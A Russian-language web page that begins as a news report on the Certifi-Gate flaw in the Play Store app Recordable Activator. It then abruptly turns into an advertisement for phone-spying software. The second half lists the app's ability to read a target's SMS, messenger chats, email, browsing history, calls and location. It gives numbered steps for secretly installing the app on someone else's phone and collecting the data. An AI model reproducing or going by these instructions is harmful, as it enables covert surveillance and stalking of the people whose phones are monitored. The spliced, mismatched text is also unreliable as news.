Уязвимости Certifi-Gate подвержены приложения из официального магазина Google

4b01eafa84775e9861d290033e608495

Специалисты по Интернет безопасности из Check Point опубликовали информацию о новой программе, которая стала подвержена уязвимости Certifi-Gate. Как уже сообщалось ранее, данная проблема не решается на программном уровне, обычным обновлением прошивки. Корпорация Google направила запрос всем производителям смартфонов, поэтому остаётся ждать лишь новых моделей трубок. Также запрос был к разработчикам соответствующего ПО, которое могло бы эксплуатировать уязвимость.
Представители Check Point обнаружили брешь в приложении Recordable Activator, которая до сих пор не исправлена. Программа Recordable Activator была разработана Invisibility Ltd., её легко можно найти в официальном Play Market от Google. Приложение предназначается для быстрой и удобной записи скринкастов пользователями. При работе используется плагин TeamViewer, который считается уязвимым и небезопасным. Суть самой бреши сводится к использованию сертификатов безопасности Remote Support Tool (mRST).

Разработчик Recordable Activator знает о наличии уязвимости, поскольку соответствующее уведомление он получил ещё в апреле 2015. Однако программист не стал убирать уязвимый плагин, поскольку с ним программа работает лучше. Представители Google Play заявили, что уже в ближайшее время приложение будет убрано из официального магазина. Однако оно будет встречаться в сторонних маркетах, но с изменённым названием. Эксперты Check Point предупреждают, что данный софт представляет большую опасность сохранности личных данных. Все пользователи, установившие его, должны немедленно произвести деинсталляцию.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.